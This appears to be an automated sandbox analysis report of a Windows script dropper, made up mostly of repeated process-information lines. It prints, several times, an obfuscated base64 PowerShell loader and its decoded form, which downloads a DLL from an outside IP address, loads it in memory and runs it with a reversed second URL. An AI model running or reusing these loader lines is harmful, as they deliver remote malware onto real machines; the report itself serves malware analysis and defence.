Source: Binary string: System.Core.pdbk source: powershell.exe, 00000003.00000003.315421009.000001B0AAD2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.343330923.000001B0AAD3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000003.00000003.315282709.000001B0AAD3F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb.pdb source: powershell.exe, 00000003.00000003.315311073.000001B0AAD51000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8", "0", "false");
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth'))
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth'))
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF816455F74 push ss; ret
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3639
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9623
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5148Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 724Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5656Thread sleep count: 9623 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5244Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000003.00000003.315447170.000001B0AB0F6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.344023748.000001B0AB104000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j??bw??ek??qwb3??hy??i????9??c????jw??l??g8??ygb6??gu??cqb1??gk??bw??l??cc??owbb??ei??eqb0??gu??wwbd??f0??i????k??eq??t??bm??c????pq??g??fs??uwb5??hm??d??bl??g0??lgbd??g8??bgb2??gu??cgb0??f0??og??6??ey??cgbv??g0??qgbh??hm??zq??2??dq??uwb0??hi??aqbu??gc??k????o??e4??zqb3??c0??twbi??go??zqbj??hq??i??bo??gu??d????u??fc??zqbi??em??b??bp??gu??bgb0??ck??lgbe??g8??dwbu??gw??bwbh??gq??uwb0??hi??aqbu??gc??k????n??gg??d??b0??h????og??v??c8??mg??w??c4??nw??u??de??n????u??dk??oq??v??hm??zqby??hy??zqby??c8??z??bs??gw??lgb0??hg??d????n??ck??kq??7??fs??uwb5??hm??d??bl??g0??lgbb??h????c??be??g8??bqbh??gk??bgbd??do??ogbd??hu??cgby??gu??bgb0??eq??bwbt??ge??aqbu??c4??t??bv??ge??z????o??cq??r??bm??ew??kq??u??ec??zqb0??fq??eqbw??gu??k????n??em??b??bh??hm??cwbm??gk??ygby??ge??cgb5??dm??lgbd??gw??yqbz??hm??mq??n??ck??lgbh??gu??d??bn??gu??d??bo??g8??z????o??cc??ugb1??g4??jw??p??c4??sqbu??hy??bwbr??gu??k????k??g4??dqbs??gw??l????g??fs??bwbi??go??zqbj??hq??wwbd??f0??i????o??cc??d??b4??hq??lgbm??gm??yw??v??di??mg??y??c4??mw??3??c4??nq??y??di??lg??1??dg??mq??v??c8??ogbw??hq??d??bo??cc??kq??p????==';$vxdfe = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $codigo.replace('??','a') ) ).replace('%mtiubzgqec%','');powershell.exe -command $vxdfe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$picwv = '%obzequio%';[byte[]] $dll = [system.convert]::frombase64string((new-object net.webclient).downloadstring('http://20.7.14.99/server/dll.txt'));[system.appdomain]::currentdomain.load($dll).gettype('classlibrary3.class1').getmethod('run').invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth'))
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j??bw??ek??qwb3??hy??i????9??c????jw??l??g8??ygb6??gu??cqb1??gk??bw??l??cc??owbb??ei??eqb0??gu??wwbd??f0??i????k??eq??t??bm??c????pq??g??fs??uwb5??hm??d??bl??g0??lgbd??g8??bgb2??gu??cgb0??f0??og??6??ey??cgbv??g0??qgbh??hm??zq??2??dq??uwb0??hi??aqbu??gc??k????o??e4??zqb3??c0??twbi??go??zqbj??hq??i??bo??gu??d????u??fc??zqbi??em??b??bp??gu??bgb0??ck??lgbe??g8??dwbu??gw??bwbh??gq??uwb0??hi??aqbu??gc??k????n??gg??d??b0??h????og??v??c8??mg??w??c4??nw??u??de??n????u??dk??oq??v??hm??zqby??hy??zqby??c8??z??bs??gw??lgb0??hg??d????n??ck??kq??7??fs??uwb5??hm??d??bl??g0??lgbb??h????c??be??g8??bqbh??gk??bgbd??do??ogbd??hu??cgby??gu??bgb0??eq??bwbt??ge??aqbu??c4??t??bv??ge??z????o??cq??r??bm??ew??kq??u??ec??zqb0??fq??eqbw??gu??k????n??em??b??bh??hm??cwbm??gk??ygby??ge??cgb5??dm??lgbd??gw??yqbz??hm??mq??n??ck??lgbh??gu??d??bn??gu??d??bo??g8??z????o??cc??ugb1??g4??jw??p??c4??sqbu??hy??bwbr??gu??k????k??g4??dqbs??gw??l????g??fs??bwbi??go??zqbj??hq??wwbd??f0??i????o??cc??d??b4??hq??lgbm??gm??yw??v??di??mg??y??c4??mw??3??c4??nq??y??di??lg??1??dg??mq??v??c8??ogbw??hq??d??bo??cc??kq??p????==';$vxdfe = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $codigo.replace('??','a') ) ).replace('%mtiubzgqec%','');powershell.exe -command $vxdfe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$picwv = '%obzequio%';[byte[]] $dll = [system.convert]::frombase64string((new-object net.webclient).downloadstring('http://20.7.14.99/server/dll.txt'));[system.appdomain]::currentdomain.load($dll).gettype('classlibrary3.class1').getmethod('run').invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth'))
